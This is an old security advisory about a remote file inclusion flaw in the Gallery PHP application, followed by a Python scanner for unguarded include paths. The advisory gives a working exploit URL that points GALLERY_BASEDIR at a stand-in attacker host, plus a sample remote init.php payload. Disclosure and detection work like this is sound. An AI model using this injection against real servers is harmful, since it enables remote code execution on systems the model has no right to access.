code injection in gallery

Type securityvulns
Reporter Securityvulns
Modified 2002-08-03T00:00:00



Code injection in gallery

What is gallery?

The Gallery is actually the best web gallery application around in the world. I'm using it too ;-). Go to <> to get further information and download this very cool app.

remote include problems

Problem description

Several include statements include a variable without checking it. An administrator of PowerTech (an ISP in Norway) discovered these problems.

You're able to inject foreign code into the application (if allow_url_fopen is turned on).

Example code:

errors/configmode.php
[...]
<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>
[...]

How can I exploit the code?

Use this line: http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/

On http://your.evil.server.tdl/ you place a file called init.php that puts out nasty php-code. The file could look like this:

init.php:
<?php echo "<?php phpinfo(); ?>"; ?>

And the solution?

Go to <> to see how to solve the problem.

Why do you post this problem again?

Because the author of the announcement on the gallery website said:

An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relatively easy to do. All you need to do is edit these files:

errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php

That's not absolutely right: you have to patch the file captionator.php too!

Hope it's fixed in new releases :). PS: Their website is now updated.
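
One way to find every file with this pattern instead of relying on a list of file names (an added example, not code from this advisory or from the Gallery project): the script flags each include/require whose path starts with a variable that the file has not assigned on an earlier line. It generalizes from $GALLERY_BASEDIR to any variable; the function names are made up for this example, and every sample file except the errors/configmode.php line is constructed.

```python
import re
from pathlib import Path

# include/require(_once) whose path expression starts with a PHP variable
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)', re.I)
# plain assignment "$var = ...", excluding "==" comparisons and "=>" array pairs
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?![=>])')

def find_unguarded_includes(files):
    """files maps a relative path to PHP source text.

    Returns sorted (path, line_no, variable) tuples for each include/require
    whose path starts with a variable the file has not assigned on an earlier
    line. Heuristic: no control-flow analysis, does not follow includes.
    """
    findings = []
    for path, source in files.items():
        assigned = set()
        for line_no, line in enumerate(source.splitlines(), start=1):
            for match in INCLUDE_RE.finditer(line):
                if match.group(1) not in assigned:
                    findings.append((path, line_no, match.group(1)))
            assigned.update(ASSIGN_RE.findall(line))
    return sorted(findings)

def load_tree(root):
    """Read every *.php file under root into the mapping used above."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p.read_text(errors="replace")
            for p in root.rglob("*.php")}

SAMPLE_TREE = {
    # the line quoted in the advisory
    "errors/configmode.php":
        '<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>\n',
    # constructed: an include of init.php, as the advisory's description implies
    "captionator.php": '<?php\nrequire($GALLERY_BASEDIR . "init.php");\n?>\n',
    # constructed, hypothetical: the file sets the prefix itself first
    "sets_prefix.php":
        '<?php\n$GALLERY_BASEDIR = "./";\nrequire($GALLERY_BASEDIR . "init.php");\n?>\n',
    # constructed: constant path, nothing to flag
    "static.php": '<?php include("header.php"); ?>\n',
}

if __name__ == "__main__":
    for path, line_no, var in find_unguarded_includes(SAMPLE_TREE):
        print(f"{path}:{line_no}: include path starts with unassigned ${var}")
```

To audit an installed copy, pass the result of load_tree() on the gallery directory instead of SAMPLE_TREE.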


For the German-speaking folk: <>

Noncredit: florg, thank you for turning off the whole website! :/
